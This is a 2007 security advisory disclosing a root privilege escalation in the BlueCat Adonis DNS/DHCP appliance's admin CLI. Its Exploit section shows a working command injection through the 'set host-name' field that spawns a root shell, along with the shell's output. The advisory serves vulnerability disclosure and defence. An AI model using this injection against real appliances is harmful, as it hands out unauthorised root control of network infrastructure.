Template Security Security Advisory
-----------------------------------

  BlueCat Networks Adonis CLI root privilege escalation

  Date: 2007-08-16
  Advisory ID: TS-2007-003-0
  Vendor: BlueCat Networks, http://www.bluecatnetworks.com/
  Revision: 0

Contents
--------

  Summary
  Software Version
  Details
  Impact
  Exploit
  Workarounds
  Obtaining Patched Software
  Credits
  Revision History

Summary
-------

  Template Security has discovered a root privilege escalation
  vulnerability in the BlueCat Networks Adonis DNS/DHCP appliance
  which allows the admin user to gain root privilege from the
  Command Line Interface (CLI).

Software Version
----------------

  Adonis version 5.0.2.8 was tested.

Details
-------

  The admin account on the Adonis DNS/DHCP appliance provides
  access to a CLI that allows an administrator to perform tasks
  such as setting the IP address, netmask, system time and system
  hostname.  By entering a certain command sequence, the
  administrator is able to execute a command as root.

Impact
------

  Access to the admin account is the same as root access on the
  appliance.

Exploit
-------

  Here we use the 'set host-name' CLI command to execute a root
  shell:

    :adonis>set host-name ;bash
    adonis.katter.org
    root@adonis:~# id
    uid=0(root) gid=0(root) groups=0(root)

  NOTE: There may be other command sequences that accomplish the
  same result.

Workarounds
-----------

  Only provide admin account access to administrators that also
  have root account access on the appliance.

Obtaining Patched Software
--------------------------

  Contact the vendor.

Credits
-------

  forloop discovered this vulnerability while enjoying a Tuborg
  Gold.  forloop is a member of Template Security.

Revision History
----------------

  2007-08-16: Revision 0 released